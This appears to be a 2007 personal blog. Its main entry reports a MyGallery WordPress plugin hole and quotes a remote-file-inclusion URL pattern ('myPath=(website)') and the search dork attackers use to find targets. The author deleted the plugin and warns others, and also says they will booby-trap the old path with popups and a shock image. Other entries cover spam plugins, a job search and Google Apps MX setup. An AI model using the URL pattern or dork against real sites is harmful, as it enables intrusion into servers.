Author: Cupcakey

Ever since the MyGallery exploit was made aware to me, I’ve been checking up on my install of Mint to see what’s been going on with some of the pages here, and it’s amazing how many people (mostly those that apparently don’t understand English) are still trying to access the mygallerybrowser.php file. The amount of people googling for the issue, and the number of people that directly come to this site by copy/pasting in their “hacking” url amaze me. I even went as far as putting up goaste on the page they’re trying to access but even that didn’t deter them from trying. It’s actually really annoying, because all of my logs are infested with this crap. Searches are almost 100% “inurl:/mygallery/myfunctions/” and same for refferals, give or take a few foreign hackingforums.

Seriously, the file. is. not. there. anymore. NOTHING IS GOING TO HAPPEN! But I am half tempted to recreate those files and place a shitload of banner popup ads that’ll explode in their face when they access the page.. Actually, yes, that is exactly what I am going to do.

Edit: Let’s see if they like tubgirl.

EDIT: I highly recommend to any user, to either remove this script until a fix can be made. The file that is being affected and used is /mygallerybrowser.php?. The creator (page translated from German to English) of the plugin updated today and said to upgrade to the latest version, or deactivate the plugin.

Earlier today I received an e-mail from “WaLhEZ” as follows:

Hi, i am visit you site, and see the problem with and I have seen that you have bug that even allows that somebody ill-disposed one can enter your host and provocate damage, obtaining pass of your FTP, dates base… etc the problem this in plugin mygallery, specifically in the file mygallerybrowser.php. This it is an example of as they can enter your servant and dañarte watches: wp-content/plugins/ mygallery/myfunctions /mygallerybrowser.php?myPath=(website)? And I communicate this to him, so that it fixes it, this bug I have discovered I to it, and I want to communicate it to it so that they are not going to him to damage his blog, that by the way this very pretty. I wait for its answer… And it pardons my English is not very good. Contacme and I see as I can help him.

Upon receiving his e-mail, I didn’t know whether it was hoax, as I knew I didn’t have MyGallery plugin activated, though I did have it under my /plugins/ directory. Though upon accessing it via the url he had included in his e-mail, I was able to go to the file under the directory, though with some PHP errors. I then went ahead and CHMODd the files so that they couldn’t be accessed, and then deleted it from my server since I’m not using it.

After deleting it I also went through my access logs and errors logs but didn’t see too much activity other then what matched his IP address and what matched my IP address in regards to the access URL and plugin directory. Though all day today I’ve had a lot of hits coming from google searches for “inurl:/mygallery/myfunctions” (and from various languages too like es, it, co.ma, and com.tr) without the quotes. I’ve also had quite a bit of hits from a hacking forum, Tryag.com/CC (the link is a direct link to the thread.) Unforutnately the only way to view what is on that forum is by registering and I believe it’s turned off. I didn’t run it through a translator, but I figured that’s what the message was saying.

I’m going to look more into this, but if you’re using this plugin, definitely keep an eye out. If you or someone else is using this plugin, feel free to link them to this entry. I’ll be updating it through the day(s) when I come across more information on the issue.

After almost four months of working at home, I finally trekked back into the wonderful world of retail. I had my first day of work today–It was only orientation so I didn’t do too much. Right now I’m only working part time for the time being, but I am still looking around for another full time job. I’m actually waiting on Cingular to get back to me, and I believe I might have snagged a job with this time this time around.

I finally managed to get atourworst.org back to normality. It ended up being the resolving IP address that was causing the horrendous load time (it was close to 40+ seconds for me!). I was also having issues with spam bots hitting up my site every minute, and not being blocked by akismet. But now the IP issue has been fixed, and MySQL configurations have been tweaked to accommodate the site’s usage.

Thanks Bubs, Mari, and Jack for your suggestions on spam protection. I had actually installed Bad Behavior just after I posted that entry, which was actually starting to reduce the amount of comment spam. I also installed Comment Timeout which is set to close comments that are older then 60 days or haven’t had a legitimate comment on them in 35 days. I realize that it’ll inconvenience people that want to leave a comment on them if they find them through searching or other ways, but hopefully they’ll contact me if it’s that important.

So far it’s worked wonders as I haven’t had any spam problems (yesterday I had about 350+ “approved” spam comments make it through) since Bad Bahavior has stopped 414 access attempts since yesterday, and akismet has managed to catch 88 comments just from yesterday alone.

Things should be running along smoothly now! With all that done and done with my first day of work, I’m just waiting for Mark to stop by and then we’re heading to his friend Crystal’s apartment to play some Guitar Hero II for the Xbox 360.

Edit at 4/29/07 @ 1:08am — A few hours ago I ended up getting a call for another interview on Monday. I would love to have this job because it would put me back on the path with computers and its peripherals. It’s for a Tiger Direct store in my area. The best part about the phone call? He was highly impressed with my application. Ahem, I’ll take a bow now, thanks.

I have no idea what is going on with my site, but for some reason things feel wonky. My site’s load time has been pretty shoddy today; Loading up my entries takes forever, and askimet seems to be failing miserably.

I’ve been receiving comment spam every minute, since 10am this morning and Akismet hasn’t caught a single on of those. Somehow they all got approved. I have this inkling that a plugin I activated (then later deactivated) had some cataclysmic effect. I’ve probably deleted well over 100 comments that were spam, and somehow got approved despite not having an e-mail address.

For now until I find a suitable method of “protection” (I really don’t want to go the way of captcha) I have now set up comments to be moderated if the comment author is not already in the database (and approved.) So if you’re a new visitor to my website and you leave a comment, don’t fret. When I see it, I will approve it immediately!

No doubt I’m sure a lot of you are aware of this bandwidth exceeded evil mockery of a page. It’s honestly been awhile since I’ve stumbled across a page that had a 503 page on it, due to the large amounts of bandwidth that most hosts now have with their packages. Anyway, after viewing Bubs’ page and seeing that her bandwidth limit exceeded, I realized that the e-mail I was writing to her, wouldn’t get to her until she A.) Paid for more bandwidth to last her until the a new month, B.) Waited until May started to renew the bandwidth. This was because she was using her domain+hosting to receive/send out mail (at least, I’m assuming so.)

Even though I can control my own bandwidth, I have my e-mail accounts hosted off of my server. I currently use the Google Apps service for mail. There are two editions for the Apps: Standard Edition which is free, and Premier Edition which is $50/year. If you want to check out what the difference is, you can view their comparison. I currently have the standard edition, since I don’t utilize what the Premier offers.

With Google Apps, you can create your own e-mail “service” that will utilize GMail’s interface if you chose the webmail route, or you can use POP3 accounts which utilize’s Gmails POP and SMTP ports. Setting it up is very easy to do. When you go through the steps of signing up, it will provide you with two ways to authorize that you own the domain name being used. Once you have that domain name verified, you can set up your e-mail accounts through the interface (you can reach yours by http://google.com/hosted/atourworst.org. Once you have your accounts set up to your liking, you will need to log into your domain’s control panel (cpanel, dhpanel, ensim, et al.) and change your MX Entries to reflect ones provided by Google (you don’t/won’t need to use all of these, you can pick one):

• aspmx.l.google.com.
• alt1.aspmx.l.google.com.
• alt2.aspmx.l.google.com.
• aspmx2.googlemail.com.
• aspmx3.googlemail.com.
• aspmx4.googlemail.com.
• aspmx5.googlemail.com.

So, even if your website has exceeded bandwidth, or hell, your server is down, you’ll still be able to send and receive e-mails. The reason why I also like this is because of GMail’s spam box that will rid of all the junk, so I won’t have to worry about receiving hundreds of crap e-mails. I don’t use the webmail feature often, since I prefer POP3, but if I’m out and about (say at Mark’s place) I’ll just log into my GH account and check mail through there.

Here are some images of Google Hosted’s admin panel:

Continue reading “503 Bandwidth Limit Exceeded + Google Apps” →